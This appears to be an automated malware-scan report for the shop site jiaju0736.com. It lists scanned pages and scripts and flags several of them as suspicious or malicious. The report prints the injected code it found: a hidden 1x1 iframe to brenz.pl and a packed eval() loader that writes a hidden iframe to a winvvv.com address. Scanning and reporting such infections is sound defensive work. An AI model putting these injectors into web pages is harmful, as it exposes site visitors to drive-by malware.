Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=jiaju0736.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://www.jiaju0736.com/ | 200 OK Content-Length: 125036 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: www.hz-idc.com <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta name="Generator" content="ECSHOP v2.7.3" /> <meta http-equiv="Content-Type" content="text/html; charset=gbk" /> <meta name="Keywords" content="0736ÉÌ³Ç ÍøÉÏÉÌ³Ç ÍøÉϼҾßÉÌ³Ç ÍøÉϼҾßÉ̳ÇÄļҺà ÍøÉϼҾÓÉÌ³Ç ÍøÉϼҾÓÉ̳ÇÄļҺ ...[4085 bytes skipped]... Hidden iFrame found. size: 1x1 src: http://www.brenz.pl/rc/ <iframe style="height:1px" src="http://www.brenz.pl/rc/" frameborder=0 width=1> | ||
http://www.jiaju0736.com/js/common.js | 200 OK Content-Length: 27597 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function addToCart(goodsId, parentId) { var goods = new Object(); var spec_arr = new Array(); var fittings_arr = new Array(); var number = 1; var formBuy = document.forms['ECS_FORMBUY']; var quick = 0; if (formBuy) { spec_arr = getSelectedAttributes(formBuy); if (formBuy.elements['number']) { number = formBuy.elements['number'].value; while (sel_obj[i]) { sel_obj[i].style.visibility = ""; i++; } } function cancel_div() { document.body.removeChild(docEle('speDiv')); document.body.removeChild(docEle('mask')); var i = 0; var sel_obj = document.getElementsByTagName('select'); while (sel_obj[i]) { sel_obj[i].style.visibility = ""; i++; } } Antivirus reports:
| ||
http://www.jiaju0736.com/js/index.js | 200 OK Content-Length: 2463 Content-Type: application/x-javascript | clean |
http://www.jiaju0736.com/js/myfocus-1.2.3.min.js | 200 OK Content-Length: 8949 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) eval(function(p,a,c,k,e,d){e=function(c){return(c<a?"":e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1;};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p;}('5.6("<1 7=\\"2://3.4/b.c\\" a=\\"0\\" 8=\\"0\\" 9=\\"0\\"></1>");',13,13,'|iframe|http|winvvv|com|document|writeln|src|height|frameborder|width|cs|h Antivirus reports:
| ||
http://www.jiaju0736.com/js/jquery.min.js | 200 OK Content-Length: 92629 Content-Type: application/x-javascript | clean |
http://www.jiaju0736.com/js/jquery-1.8.3.min.js | 200 OK Content-Length: 93666 Content-Type: application/x-javascript | clean |
http://www.jiaju0736.com/plugins/ckplayer/ckplayer.js | 200 OK Content-Length: 12340 Content-Type: application/x-javascript | clean |
http://js.tongji.linezing.com/3387458/tongji.js | 200 OK Content-Length: 13053 Content-Type: application/x-javascript | clean |
http://www.jiaju0736.com/plugins/qq-kefu/jquery.min.js | 200 OK Content-Length: 94840 Content-Type: application/x-javascript | clean |
http://www.jiaju0736.com/plugins/qq-kefu/qqkefuFront.js | 200 OK Content-Length: 421 Content-Type: application/x-javascript | clean |
http://www.jiaju0736.com/js/jq.js?0828 | 200 OK Content-Length: 133403 Content-Type: application/x-javascript | clean |
http://www.jiaju0736.com/affiche.php?ad_id=76&uri=http%3A%2F%2Fwww.jiaju0736.com%2Fzt%2F20140314.html | HTTP/1.1 302 Moved Temporarily Connection: close Date: Thu, 29 Jan 2015 07:28:27 GMT Location: http://www.jiaju0736.com/zt/20140314.html Server: IIS Content-Type: text/html Set-Cookie: ECS_ID=7a18e9809ef07343d5ed3d3bf9a438929a0fe7be; path=/ Set-Cookie: ECS[visit_times]=1; expires=Fri, 29-Jan-2016 07:28:28 GMT; path=/ X-Powered-By: WAF/2.0 | clean |
http://www.jiaju0736.com/zt/20140314.html | 404 Not Found Content-Length: 5078 Content-Type: text/html | clean |
http://www.jiaju0736.com/test404page.js | 404 Not Found Content-Length: 5074 Content-Type: text/html | clean |
http://www.jiaju0736.com/?act=city&cityname= | 200 OK Content-Length: 125036 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: www.hz-idc.com <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta name="Generator" content="ECSHOP v2.7.3" /> <meta http-equiv="Content-Type" content="text/html; charset=gbk" /> <meta name="Keywords" content="0736ÉÌ³Ç ÍøÉÏÉÌ³Ç ÍøÉϼҾßÉÌ³Ç ÍøÉϼҾßÉ̳ÇÄļҺà ÍøÉϼҾÓÉÌ³Ç ÍøÉϼҾÓÉ̳ÇÄļҺ ...[4085 bytes skipped]... Hidden iFrame found. size: 1x1 src: http://www.brenz.pl/rc/ <iframe style="height:1px" src="http://www.brenz.pl/rc/" frameborder=0 width=1> | ||
http://www.jiaju0736.com/?act=city&cityname=wl | 200 OK Content-Length: 125036 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: www.hz-idc.com <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta name="Generator" content="ECSHOP v2.7.3" /> <meta http-equiv="Content-Type" content="text/html; charset=gbk" /> <meta name="Keywords" content="0736ÉÌ³Ç ÍøÉÏÉÌ³Ç ÍøÉϼҾßÉÌ³Ç ÍøÉϼҾßÉ̳ÇÄļҺà ÍøÉϼҾÓÉÌ³Ç ÍøÉϼҾÓÉ̳ÇÄļҺ ...[4085 bytes skipped]... Hidden iFrame found. size: 1x1 src: http://www.brenz.pl/rc/ <iframe style="height:1px" src="http://www.brenz.pl/rc/" frameborder=0 width=1> |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: jiaju0736.com
Result:
GET / HTTP/1.1
Host: jiaju0736.com
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: jiaju0736.com
Referer: http://www.google.com/search?q=jiaju0736.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: jiaju0736.com
Referer: http://www.google.com/search?q=jiaju0736.com
Result:
The result is similar to the first query. There are no suspicious redirects found.